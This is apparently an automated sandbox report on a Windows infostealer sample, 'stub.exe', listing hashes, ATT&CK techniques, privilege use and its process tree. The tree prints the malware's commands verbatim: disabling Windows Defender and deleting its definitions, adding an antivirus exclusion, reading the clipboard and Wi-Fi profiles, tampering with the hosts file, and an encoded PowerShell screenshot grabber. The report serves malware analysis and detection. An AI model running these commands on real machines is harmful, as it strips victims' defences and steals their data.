51efd2feaf9fd0eefd97afb13cd6590c9377544153d4a7d7223e23d04c68cd05

Analysis

max time kernel
1789s
max time network
1773s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
06/01/2024, 03:43

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

stub.exe
Size

8.5MB
MD5

3db9bf3efe3df1c4e0c094595a3b8054
SHA1

ac633f884dca446312eb070e199c570dfc6c6a40
SHA256

51efd2feaf9fd0eefd97afb13cd6590c9377544153d4a7d7223e23d04c68cd05
SHA512

377060ce8fe2fd247cab22b92d3b9ba934e1bd483fd6c0a2bc79fab30e0487197df816e1658cb06e11eb63354e128fa4da9acfd7fa0a8c911eeae2d0ce4a34bb
SSDEEP

196608:rV1kcE61W903eV4QR7MToEuGxgh858F0ibfU36e7mgABHbk9qtllJ:sctW+eGQR7MTozGxu8C0ibfY6e5ba

Score

8^/10

spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	stub.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Loads dropped DLL 17 IoCs

pid	Process
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe
4692	stub.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1324	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
2872	tasklist.exe
1972	tasklist.exe
3284	tasklist.exe
3280	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4688	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
3928	powershell.exe
1604	powershell.exe
3928	powershell.exe
1604	powershell.exe
1604	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
4056	powershell.exe
4056	powershell.exe
4284	powershell.exe
4284	powershell.exe
1588	powershell.exe
1588	powershell.exe
4868	powershell.exe
4868	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	2872	tasklist.exe
Token: SeDebugPrivilege	1972	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3472	WMIC.exe
Token: SeSecurityPrivilege	3472	WMIC.exe
Token: SeTakeOwnershipPrivilege	3472	WMIC.exe
Token: SeLoadDriverPrivilege	3472	WMIC.exe
Token: SeSystemProfilePrivilege	3472	WMIC.exe
Token: SeSystemtimePrivilege	3472	WMIC.exe
Token: SeProfSingleProcessPrivilege	3472	WMIC.exe
Token: SeIncBasePriorityPrivilege	3472	WMIC.exe
Token: SeCreatePagefilePrivilege	3472	WMIC.exe
Token: SeBackupPrivilege	3472	WMIC.exe
Token: SeRestorePrivilege	3472	WMIC.exe
Token: SeShutdownPrivilege	3472	WMIC.exe
Token: SeDebugPrivilege	3472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3472	WMIC.exe
Token: SeRemoteShutdownPrivilege	3472	WMIC.exe
Token: SeUndockPrivilege	3472	WMIC.exe
Token: SeManageVolumePrivilege	3472	WMIC.exe
Token: 33	3472	WMIC.exe
Token: 34	3472	WMIC.exe
Token: 35	3472	WMIC.exe
Token: 36	3472	WMIC.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	3284	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3472	WMIC.exe
Token: SeSecurityPrivilege	3472	WMIC.exe
Token: SeTakeOwnershipPrivilege	3472	WMIC.exe
Token: SeLoadDriverPrivilege	3472	WMIC.exe
Token: SeSystemProfilePrivilege	3472	WMIC.exe
Token: SeSystemtimePrivilege	3472	WMIC.exe
Token: SeProfSingleProcessPrivilege	3472	WMIC.exe
Token: SeIncBasePriorityPrivilege	3472	WMIC.exe
Token: SeCreatePagefilePrivilege	3472	WMIC.exe
Token: SeBackupPrivilege	3472	WMIC.exe
Token: SeRestorePrivilege	3472	WMIC.exe
Token: SeShutdownPrivilege	3472	WMIC.exe
Token: SeDebugPrivilege	3472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3472	WMIC.exe
Token: SeRemoteShutdownPrivilege	3472	WMIC.exe
Token: SeUndockPrivilege	3472	WMIC.exe
Token: SeManageVolumePrivilege	3472	WMIC.exe
Token: 33	3472	WMIC.exe
Token: 34	3472	WMIC.exe
Token: 35	3472	WMIC.exe
Token: 36	3472	WMIC.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	3280	tasklist.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeIncreaseQuotaPrivilege	4328	WMIC.exe
Token: SeSecurityPrivilege	4328	WMIC.exe
Token: SeTakeOwnershipPrivilege	4328	WMIC.exe
Token: SeLoadDriverPrivilege	4328	WMIC.exe
Token: SeSystemProfilePrivilege	4328	WMIC.exe
Token: SeSystemtimePrivilege	4328	WMIC.exe
Token: SeProfSingleProcessPrivilege	4328	WMIC.exe
Token: SeIncBasePriorityPrivilege	4328	WMIC.exe
Token: SeCreatePagefilePrivilege	4328	WMIC.exe
Token: SeBackupPrivilege	4328	WMIC.exe
Token: SeRestorePrivilege	4328	WMIC.exe
Token: SeShutdownPrivilege	4328	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1340 wrote to memory of 4692	1340	stub.exe	79
PID 1340 wrote to memory of 4692	1340	stub.exe	79
PID 4692 wrote to memory of 2152	4692	stub.exe	85
PID 4692 wrote to memory of 2152	4692	stub.exe	85
PID 4692 wrote to memory of 2616	4692	stub.exe	84
PID 4692 wrote to memory of 2616	4692	stub.exe	84
PID 2152 wrote to memory of 1604	2152	cmd.exe	82
PID 2616 wrote to memory of 3928	2616	cmd.exe	81
PID 2152 wrote to memory of 1604	2152	cmd.exe	82
PID 2616 wrote to memory of 3928	2616	cmd.exe	81
PID 4692 wrote to memory of 4048	4692	stub.exe	86
PID 4692 wrote to memory of 4048	4692	stub.exe	86
PID 4692 wrote to memory of 1840	4692	stub.exe	88
PID 4692 wrote to memory of 1840	4692	stub.exe	88
PID 4692 wrote to memory of 4880	4692	stub.exe	90
PID 4692 wrote to memory of 4880	4692	stub.exe	90
PID 4048 wrote to memory of 2872	4048	cmd.exe	91
PID 4048 wrote to memory of 2872	4048	cmd.exe	91
PID 4692 wrote to memory of 2772	4692	stub.exe	94
PID 4692 wrote to memory of 2772	4692	stub.exe	94
PID 1840 wrote to memory of 1972	1840	cmd.exe	92
PID 1840 wrote to memory of 1972	1840	cmd.exe	92
PID 4692 wrote to memory of 2496	4692	stub.exe	96
PID 4692 wrote to memory of 2496	4692	stub.exe	96
PID 4692 wrote to memory of 2424	4692	stub.exe	97
PID 4692 wrote to memory of 2424	4692	stub.exe	97
PID 4692 wrote to memory of 2200	4692	stub.exe	101
PID 4692 wrote to memory of 2200	4692	stub.exe	101
PID 4692 wrote to memory of 1032	4692	stub.exe	110
PID 4692 wrote to memory of 1032	4692	stub.exe	110
PID 4692 wrote to memory of 1224	4692	stub.exe	100
PID 4692 wrote to memory of 1224	4692	stub.exe	100
PID 4880 wrote to memory of 3472	4880	cmd.exe	107
PID 4880 wrote to memory of 3472	4880	cmd.exe	107
PID 2772 wrote to memory of 1676	2772	cmd.exe	106
PID 2772 wrote to memory of 1676	2772	cmd.exe	106
PID 4692 wrote to memory of 1156	4692	stub.exe	102
PID 4692 wrote to memory of 1156	4692	stub.exe	102
PID 2496 wrote to memory of 3284	2496	cmd.exe	111
PID 2496 wrote to memory of 3284	2496	cmd.exe	111
PID 1032 wrote to memory of 4252	1032	cmd.exe	116
PID 1032 wrote to memory of 4252	1032	cmd.exe	116
PID 2424 wrote to memory of 4976	2424	cmd.exe	112
PID 2424 wrote to memory of 4976	2424	cmd.exe	112
PID 1224 wrote to memory of 4688	1224	cmd.exe	114
PID 1224 wrote to memory of 4688	1224	cmd.exe	114
PID 2200 wrote to memory of 4568	2200	cmd.exe	136
PID 2200 wrote to memory of 4568	2200	cmd.exe	136
PID 1156 wrote to memory of 3156	1156	cmd.exe	115
PID 1156 wrote to memory of 3156	1156	cmd.exe	115
PID 4692 wrote to memory of 2116	4692	stub.exe	117
PID 4692 wrote to memory of 2116	4692	stub.exe	117
PID 2116 wrote to memory of 2912	2116	cmd.exe	119
PID 2116 wrote to memory of 2912	2116	cmd.exe	119
PID 4692 wrote to memory of 1148	4692	stub.exe	120
PID 4692 wrote to memory of 1148	4692	stub.exe	120
PID 4692 wrote to memory of 2292	4692	stub.exe	121
PID 4692 wrote to memory of 2292	4692	stub.exe	121
PID 2292 wrote to memory of 3916	2292	cmd.exe	124
PID 2292 wrote to memory of 3916	2292	cmd.exe	124
PID 4692 wrote to memory of 1476	4692	stub.exe	152
PID 4692 wrote to memory of 1476	4692	stub.exe	152
PID 1148 wrote to memory of 1560	1148	cmd.exe	146
PID 1148 wrote to memory of 1560	1148	cmd.exe	146

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3260	attrib.exe
1560	attrib.exe

C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1340
- C:\Users\Admin\AppData\Local\Temp\stub.exe
  "C:\Users\Admin\AppData\Local\Temp\stub.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2496
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3156
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1pw4yftp\1pw4yftp.cmdline"
        5⤵
        
        PID:4176
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES366D.tmp" "c:\Users\Admin\AppData\Local\Temp\1pw4yftp\CSC93178B8566F45D78FD03E38DA1D6AA4.TMP"
        6⤵
        
        PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1476
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2240
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
